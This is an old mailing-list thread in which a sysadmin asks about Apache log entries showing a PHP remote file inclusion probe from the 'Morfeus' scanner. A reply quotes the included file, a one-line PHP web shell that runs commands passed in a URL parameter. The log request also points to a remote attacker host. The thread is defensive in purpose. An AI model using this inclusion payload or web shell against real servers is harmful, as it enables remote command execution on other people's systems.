On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> Hello,
>
> I found these errors in our web logs and it appears that either there is a
> PHP attack on the apache site or perhaps a kit on the server?
>
> Errors below (profanity not mine);
>
>
> 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET
>
/components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li
> sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP
apps.
M.txt contains:
<?
system($_GET['cmd']);
die ("Morfeus hacked you");
?>
~~~~
It doesn't appear that the system was compromised. How can I protect the
system from such an attack?
Best regards,
~James
--
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
